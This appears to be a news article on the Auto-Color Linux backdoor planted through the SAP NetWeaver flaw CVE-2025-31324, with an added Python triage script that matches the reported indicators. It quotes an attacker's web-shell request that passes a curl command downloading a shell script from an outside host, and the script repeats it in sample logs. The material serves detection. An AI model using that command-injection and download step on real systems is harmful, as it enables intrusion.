
Malicious actors insert "Auto-Color" malware into systems following SAP intrusions, with Darktrace intercepting an assault on a chemical corporation.

Uncovering the Methods Used by Hackers to Abuse SAP's Security Vulnerabilities and Insert the 'Auto-Color' Malware. Swift Response from Darktrace.

Unscrupulous hackers infiltrate SAP systems, embedding the harmful "Auto-Color" malware; Darktrace thwarts the assault on a chemical company.


In a recent cybersecurity incident, a Linux malware known as the Auto-Color backdoor has been detected infiltrating systems through a critical security vulnerability in SAP NetWeaver, identified as CVE-2025-31324.

On April 25, 2025, Darktrace observed unusual activity consistent with probing for the CVE-2025-31324 vulnerability. The incident began with an incoming connection from IP address 91.193.19[.]109, followed by the download of a ZIP file, which marked the initial exploitation.

The Auto-Color backdoor is particularly tenacious and difficult to detect: each instance uses a unique file name and a unique hash, and its command-and-control data is embedded at build time. It targets Linux systems by abusing built-in loader mechanisms such as ld.so.preload.

Once the malware is executed, it downloads a script via the file helper.jsp, which had been downloaded during the first exploit. The device continued to receive incoming connections with URIs containing "/developmentserver/metadatauploader", with a total of seven files downloaded.

One of these downloads was a shell script named config.sh, which was received from 23.186.200[.]173 with the URI "/irj/helper.jsp?cmd=curl -O hxxps://ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.sh".

The Auto-Color backdoor is known to support remote code execution, reverse shells, proxy relaying, file modification, and dynamic configuration updates. If the C2 server is unreachable, Auto-Color effectively goes dormant and withholds its full malicious functionality, so it appears harmless to analysts.

In addition, the malware uses an integrated rootkit to conceal its activities from security solutions. About 10 hours later, the device made a DNS query to "ocr-freespace.oss-cn-beijing.aliyuncs[.]com", and later, it made several connections to 47.97.42[.]177 via port 3232, an endpoint associated with Supershell, a C2 platform linked to backdoors and frequently used by threat groups associated with China.

Less than 12 hours later, and just 24 hours after the first exploitation, the attacker had the device download an ELF file, marking the delivery of the Auto-Color malware.
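The indicators in the timeline above (the metadatauploader URI, the helper.jsp web shell with a cmd parameter, the staging domain, the C2 endpoint, and the ld.so.preload abuse) can be turned into simple triage checks. The following is an added example written for this page; it is not Darktrace's code or the malware author's. It assumes a combined-format web access log and a plain-text ld.so.preload file, and the log lines, preload contents and connection records are constructed for the demonstration. The IP addresses, domain and URIs are the ones the article reports, kept in defanged ("[.]") form exactly as published.

```python
"""Defensive triage helpers built around the indicators reported in the article.

Added example, not production code from Darktrace or any vendor. The access-log
format and the sample data below are constructed; only the IP addresses, domain
and request paths come from the article (left defanged as published).
"""
import re
from urllib.parse import unquote

# Indicators taken from the article (defanged as published).
KNOWN_IPS = {"91.193.19[.]109", "23.186.200[.]173", "47.97.42[.]177"}
KNOWN_DOMAIN = "ocr-freespace.oss-cn-beijing.aliyuncs[.]com"
C2_PORT = 3232  # port the article associates with the Supershell endpoint

# Request paths the article associates with the intrusion chain.
UPLOADER_PATH = "/developmentserver/metadatauploader"
WEBSHELL_PATH = "/irj/helper.jsp"

# Constructed sample access-log lines (combined format); not real telemetry.
SAMPLE_ACCESS_LOG = """\
91.193.19[.]109 - - [25/Apr/2025:10:02:11 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 512
10.0.0.5 - - [25/Apr/2025:10:05:40 +0000] "GET /irj/portal HTTP/1.1" 200 8421
23.186.200[.]173 - - [25/Apr/2025:11:17:03 +0000] "GET /irj/helper.jsp?cmd=curl%20-O%20hxxps://ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.sh HTTP/1.1" 200 120
10.0.0.9 - - [25/Apr/2025:11:20:00 +0000] "GET /irj/helper.jsp HTTP/1.1" 404 0
"""

# Minimal combined-log parser: source IP, timestamp, method, URI, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def triage_access_log(text):
    """Return (timestamp, source ip, reasons) for each line matching a page indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, status = m["ip"], m["ts"], m["status"]
        uri = unquote(m["uri"])  # decode %20 etc. so the command is readable
        path, _, query = uri.partition("?")
        reasons = []
        if path == UPLOADER_PATH:
            reasons.append("metadatauploader request (CVE-2025-31324 exploitation path)")
        if path == WEBSHELL_PATH and "cmd=" in query and status == "200":
            reasons.append("command passed to helper.jsp web shell")
        if KNOWN_DOMAIN in uri:
            reasons.append("reference to staging domain " + KNOWN_DOMAIN)
        if ip in KNOWN_IPS:
            reasons.append("source IP reported in the incident")
        if reasons:
            hits.append((ts, ip, "; ".join(reasons)))
    return hits


# Constructed example of an ld.so.preload file; the library name is a placeholder.
SAMPLE_PRELOAD = "# constructed sample\n/usr/lib/libPLACEHOLDER-implant.so\n"


def unexpected_preloads(preload_text, allowlist=()):
    """Return ld.so.preload entries that are not on the allowlist.

    On most hosts the file is absent or empty, so any entry deserves review;
    the article notes that Auto-Color abuses this loader mechanism.
    """
    entries = [e.strip() for e in preload_text.splitlines()]
    return [e for e in entries if e and not e.startswith("#") and e not in allowlist]


# Constructed outbound-connection records: (destination, destination port).
SAMPLE_CONNECTIONS = [("47.97.42[.]177", 3232), ("10.0.0.2", 443), ("47.97.42[.]177", 443)]


def flag_outbound(conns):
    """Flag connections to any IP the article reports, whatever the port."""
    return [(dst, port) for dst, port in conns if dst in KNOWN_IPS]


if __name__ == "__main__":
    for ts, ip, why in triage_access_log(SAMPLE_ACCESS_LOG):
        print(f"{ts} {ip}: {why}")
    print("preload entries to review:", unexpected_preloads(SAMPLE_PRELOAD))
    print("flagged connections:", flag_outbound(SAMPLE_CONNECTIONS))
```

The web-shell check deliberately requires both a cmd parameter and a 200 response, so a scanner probing for a helper.jsp that does not exist (the 404 line) is not flagged; in a real deployment the allowlist for unexpected_preloads would hold whatever your build legitimately preloads, and the defanged indicators would be replaced by their live form before matching against real logs.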

Following the discovery of this malware, security firms such as ReliaQuest, Onapsis, and watchTowr reported increased attack attempts, and ransomware groups and Chinese APTs joined in. Mandiant discovered signs of a zero-day exploit as early as March.

It is worth noting that SAP patched the vulnerability in April 2025. However, the origins and background of the Auto-Color backdoor remain unclear, as little public information is available about where it came from.

This incident serves as a reminder for organisations to keep their systems updated and to be vigilant against such cyber threats. Regular security audits and the implementation of robust security measures can go a long way in protecting against such attacks.
